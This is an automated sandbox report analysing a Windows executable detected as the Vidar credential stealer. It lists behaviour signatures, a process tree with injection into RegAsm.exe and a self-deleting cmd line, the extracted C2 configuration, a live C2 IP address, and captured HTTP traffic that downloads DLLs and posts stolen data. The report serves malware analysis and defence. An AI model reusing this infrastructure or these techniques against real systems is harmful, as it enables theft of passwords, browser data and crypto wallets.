Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1442218
MD5:b580ff2d001291bf58bdd23a058ef21b
SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Opens network shares
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6856 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B580FF2D001291BF58BDD23A058EF21B)
    • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 3272 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 2860 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 2116 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
      • 0x221f0:$s1: JohnDoe
      • 0x31f80:$s1: JohnDoe
      • 0x221e8:$s2: HAL9TH
      00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.file.exe.70aac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              0.2.file.exe.70aac0.1.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
              • 0x201f0:$s1: JohnDoe
              • 0x201e8:$s2: HAL9TH
              3.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                3.2.RegAsm.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulationDetects executables containing potential Windows Defender anti-emulation checksditekSHen
                • 0x221f0:$s1: JohnDoe
                • 0x31f80:$s1: JohnDoe
                • 0x221e8:$s2: HAL9TH
                0.2.file.exe.70aac0.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Click to see the 5 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: file.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: https://steamcommunity.coSophos S4: Label: illegal phishing domain
                  Source: https://95.217.240.101/nss3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/nss3.dll2Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllUAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/freebl3.dllsAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/msvcp140.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.coAvira URL Cloud: Label: phishing
                  Source: https://t.me/k0monoAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/badgesAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322/inventory/Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/mozglue.dllAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/softokn3.dllKAvira URL Cloud: Label: malware
                  Source: https://95.217.240.101/sqlx.dllAvira URL Cloud: Label: malware
                  Source: https://steamcommunity.com/profiles/76561199686524322Avira URL Cloud: Label: malware
                  Source: https://95.217.240.101/vAvira URL Cloud: Label: malware
                  Found malware configuration
                  Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199686524322"], "Botnet": "9ed287469c3721fd5caf346580b2cf0d", "Version": "9.7"}
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E22BA FreeConsole,GetCurrentThreadId,PostQuitMessage,GetClipBox,CryptDecrypt,std::_Throw_Cpp_error,0_2_006E22BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004062A5 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004062A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406242 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00406242
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004082DE memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,PK11_FreeSlot,lstrcat,3_2_004082DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,3_2_0040245C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410DAC CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00410DAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C6D6C80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C82A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8244C0 PK11_PubEncrypt,3_2_6C8244C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C7F4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C824440 PK11_PrivDecrypt,3_2_6C824440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C8725B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C82A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C82A650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C808670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C808670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C84A730
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.240.101:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
                  Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
                  Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
                  Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
                  Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr
                  Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
                  Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F81B2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_006F81B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401162
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_004162AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,3_2_004153F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040B463
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_004094E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040C679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00415AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_00409F72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00409900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040A981
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,3_2_00415E66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,3_2_00415843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199686524322
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 23.194.234.100 23.194.234.100
                  Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 7081Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
